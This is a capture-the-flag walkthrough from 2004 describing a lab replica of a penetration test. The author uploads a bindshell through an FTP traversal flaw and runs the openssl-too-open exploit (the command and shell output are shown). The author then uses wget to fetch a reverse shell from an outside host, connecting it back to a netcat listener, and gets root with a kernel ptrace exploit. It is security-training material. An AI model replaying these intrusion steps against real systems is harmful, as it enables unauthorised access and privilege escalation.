This is a possible solution to hacking competition #6, held on SecureIT (15.1.04).
This is actually a replication (lab conditions) of one of my latest penetration tests, which I enjoyed thoroughly.
I would like to thank the anonymous company for allowing me to replicate their network environment, and allowing me to write up this tutorial. Cheers to you all.
1. A quick scan of hacktest.no-ip.com reveals several open ports. The fact that ports 1025 / 1026 / 3372 are open, suggests this machine is not firewalled, and is connected directly to the internet.
2. It looks like a Windows 2000 box (due to the versions of the WEB and SMTP server). There also seems to be a 3rd party ftp server - Flash FTP server 2.1.
3. I seem to remember seeing a recent vulnerability in flash ftp server, and a quick google search affirms my suspicions.
4. With a bit of trial and error, I find that the ftp username and password is ftp / ftp.
5. I log on to the ftp, and check where the ftp home directory lies. I attempt to upload a bindshell (srvcmd.exe) to the default location of the IIS "scripts" directory (using file traversal) , in order to be able to execute the bindshell.
6. Once that's done, I execute srvcmd.exe by pointing my web browser to it.
7. Once executed, the bindshell opens a cmd shell at port 2323. What's this? A dual homed machine?
8. We now have IUSR privileges on the Windows box, and the ability to ftp files to the machine using username ftp / ftp.
9. We upload out favorite toolkit to the ftp server, including a port scanner, and scan the internal network (192.168.0.0/24).
scan the internal network (192.168.0.0/24). C:internetftpserver>sl -bhtz 192.168.0.1-254 sl -bhtz 192.168.0.1-254Scan of 254 IPs started at Thu Jan 15 19:28:45 2004 ------------------------------------------------------------------------------ 192.168.0.1 Responded in 0 ms. 0 hops away Responds with ICMP unreachable: Yes TCP ports: 25 80 135 139 443 445 1025 1026 3372 3389 UDP ports: 53 67 68 135 137 138 445 500 3456
TCP 25: [220 5604625cc767428 Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Thu, 15 Jan 2004 19:28:54 -0800]
Responded in 0 ms. 0 hops away Responds with ICMP unreachable: Yes TCP ports: 21 110 389 UDP ports:
TCP 21: [220 box82. FTP server (Version wu-2.6.0(5) Thu Jan 15 14:55:16 EST 2004) ready. 530 Please login with USER and PASS. 530 Please login with USER and PASS.]
Scan finished at Thu Jan 15 19:29:25 2004ScanLine (TM) 1.01 Copyright (c) Foundstone, Inc. 2002 http://www.foundstone.com
7 IPs and 1869 ports scanned in 0 hours 0 mins 40.87 secs
C:internetftpserver>
10. Several machines show up, including their banners. All machines other than 192.168.0.111 are virtual. I was running HoneyD so simulate a larger network. Identifying the real linux box (192.168.0.111 - Running mandrake 8.2) took a long time, so I'll just cut the story short J.
11. I identify a quickly exploitable service on the mandrake machine (openssl), and upload a cygwin compiled version of the exploit (including dll's) into the ftp directory. I execute the exploit, and get a shell on the internal mandrake box.
C:internetftpserver>dir dir Volume in drive C has no label. Volume Serial Number is 20AA-0A2D
C:internetftpserver>openssl-too-open.exe -a 0x15 -v 192.168.0.111 openssl-too-open.exe -a 0x15 -v 192.168.0.111 : openssl-too-open : OpenSSL remote exploit by Solar Eclipse <solareclipse@phreedom.org>
bash-2.05$ uname -a; id; w;?[K Linux box82 2.4.18-6mdk #1 Fri Mar 15 02:59:08 CET 2002 i586 unknown uid=48(apache) gid=48(apache) groups=48(apache) USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root vc/1 - 2:31pm 7:23 0.41s 0.36s -bash bash-2.05$
12. The shell I get is a bit shifty, and echo's all my commands twice. I decide to upload a reverse bindshell onto the mandrake box, and make it connect back to my attacking machine. I do this by using wget, and retrieving the rbs.c file from www.secureit.co.il.
13. Once that's done, I compile and execute the reverse bind shell, while netcat is listening on port 4000 on the attacking machine. This gives me a cleaner shell, with "apache" user privileges.
14. Vaguely remembering the output of the uname command (Linux box82 2.4.18-6mdk) I decide to attempt a privilege escalation attack using the Linux kernel ptrace/kmod local root exploit, which should work under several 2.2.x and 2.4.x kernels.
15. I download (wget, again) compile and execute the exploit, hoping for the best.
16. The exploit was successful, and we now have root privileges on the mandrake box. The .doc file was located in /root/C.doc.
Mati Aharoni, MCSES, MCT, CCNA, CCSA, CISSP Visit the Security through Hacking Web site at http://www.secureit.co.il for additional information.